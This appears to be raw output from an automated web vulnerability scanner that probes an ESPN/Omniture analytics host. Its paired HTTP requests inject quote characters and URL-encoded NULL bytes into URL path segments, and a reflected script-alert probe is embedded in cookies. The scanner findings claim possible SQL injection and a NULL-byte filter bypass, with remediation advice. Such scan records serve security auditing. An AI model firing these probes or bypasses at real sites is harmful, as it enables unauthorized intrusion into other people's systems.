GET /b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554%00' HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 00:44:37 GMT Server: Omniture DC/2.0.0 Content-Length: 434 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554 was n ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554%00'' HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 2
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 00:44:38 GMT Server: Omniture DC/2.0.0 xserver: www600 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/wdgespcom,wdgespge/1/H.21%00'/s28015880165621 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 00:44:36 GMT Server: Omniture DC/2.0.0 Content-Length: 418 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21 was not found on this ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/wdgespcom,wdgespge/1/H.21%00''/s28015880165621 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 2
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 00:44:36 GMT Server: Omniture DC/2.0.0 xserver: www404 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/wdgespcom,wdgespge%00'/1/H.21/s28144118890631 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:29:16 GMT Server: Omniture DC/2.0.0 Content-Length: 411 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgespcom,wdgespge was not found on this server ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/wdgespcom,wdgespge%00''/1/H.21/s28144118890631 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:29:17 GMT Server: Omniture DC/2.0.0 xserver: www601 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss%00'/wdgespcom,wdgespge/1/H.21/s29519969122484 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:29:24 GMT Server: Omniture DC/2.0.0 Content-Length: 392 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss%00''/wdgespcom,wdgespge/1/H.21/s29519969122484 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:29:24 GMT Server: Omniture DC/2.0.0 xserver: www600 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842%00' HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:29:43 GMT Server: Omniture DC/2.0.0 Content-Length: 434 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842 was n ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842%00'' HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:29:43 GMT Server: Omniture DC/2.0.0 xserver: www599 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /b'/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289009677283; DETECT=1.0.0&90557&15933611&1&1; CRBLM_LAST_UPDATE=1289009493; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 14:05:29 GMT Server: Omniture DC/2.0.0 Content-Length: 439 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b''/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289009677283; DETECT=1.0.0&90557&15933611&1&1; CRBLM_LAST_UPDATE=1289009493; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 